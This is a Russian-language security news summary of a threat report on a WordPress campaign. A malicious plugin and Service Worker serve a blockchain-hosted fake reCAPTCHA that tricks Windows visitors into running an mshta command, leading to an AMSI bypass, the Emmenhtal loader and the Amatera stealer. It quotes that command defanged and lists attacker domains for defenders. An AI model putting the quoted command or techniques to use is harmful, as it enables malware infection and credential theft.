Массовая атака на WordPress: Service Worker доставляет стилер через ClickFix
Массовая кампания по компрометации сайтов на платформе WordPress заражает сотни ресурсов с помощью вредоносного must-use-плагина. Он регистрирует постоянный Service Worker, который перехватывает управление страницами посетителей, удаляет механизмы защиты Content-Security-Policy и внедряет вредоносный скрипт.
Как работает заражение
Скрипт активируется только для незарегистрированных пользователей. Чтобы не привлекать внимание администраторов, вредоносный код не работает на страницах входа в WordPress и в административных разделах. Кроме того, исключаются аутентифицированные сессии и тестовый cookie, которым управляет оператор кампании.
Service Worker сохраняется в браузерах даже после очистки заражения на стороне сервера. Поэтому для устранения последствий необходимо отменить его регистрацию и удалить связанные с ним кэши.
EtherHiding и приманка ClickFix
Внедренный скрипт использует ethers.js для чтения данных из смарт-контракта в блокчейне Base. Контракт расположен по адресу 0x58460d0b3d4d6b03761c89120393c0c676676496 и хранит активную полезную нагрузку, включая поддельную страницу reCAPTCHA.
Атака использует технику EtherHiding с механизмом on-chain dead-drop. Приманка предлагает пользователям Windows скопировать и выполнить команду mshta timelevel12[.]com/big через диалоговое окно «Выполнить». Пользователи других операционных систем получают безвредную отвлекающую информацию.
Эта схема относится к технике ClickFix. Она предполагает ручное выполнение команды жертвой и за счет этого помогает обходить стандартное сканирование вложений и загружаемых файлов.
Запуск PowerShell и обход AMSI
HTA-нагрузка декодирует команду, которая создает скрытую запланированную задачу с именем serviceerg через COM-интерфейс Schedule.Service. Задача запускает PowerShell, используя замаскированный путь с подстановочным символом и закодированную команду.
На следующем этапе PowerShell обходит Constrained Language Mode, модифицирует amsiContext для отключения сканирования AMSI, выполняет профилирование хоста и запускает последующий код в памяти.
Загрузка Emmenhtal и Amatera
PowerShell загружает загрузчик Emmenhtal с домена gpuh[.]gravityzone[.]army, используя User-Agent, имитирующий браузер. Затем Emmenhtal извлекает встроенную нагрузку из JPEG-файла, размещенного на i.ibb[.]co, и загружает ее в память как PE-файл с помощью рефлексивной загрузки. Исполняемый файл при этом не сохраняется на диске.
Финальная полезная нагрузка, Amatera, также известная как ребрендинг ACR Stealer/AcridRain, маскируется через метаданные под WPA.exe. Она крадет учетные данные и системную информацию, устанавливает корневой сертификат и взаимодействует с gw[.]proxyvector[.]cc по TLS.
Разрешение DNS выполняется через провайдеров DNS-over-HTTPS, включая Google и Cloudflare. Это скрывает запросы к C2 внутри зашифрованного DNS-трафика.
Что отслеживать специалистам по ИБ
Для выявления активности кампании специалистам по защите информации рекомендуется отслеживать:
- указанную инфраструктуру;
- активность смарт-контрактов в блокчейне Base;
- подозрительное выполнение
mshta; - скрытые запланированные задачи;
- вмешательство в AMSI;
- регистрацию
Service Worker; - трафик браузера к конечным точкам Base RPC.
Отчет получен из сервиса CTT Report Hub. Права на отчет принадлежат его владельцу.
Ознакомиться подробнее с отчетом можно по ссылке.



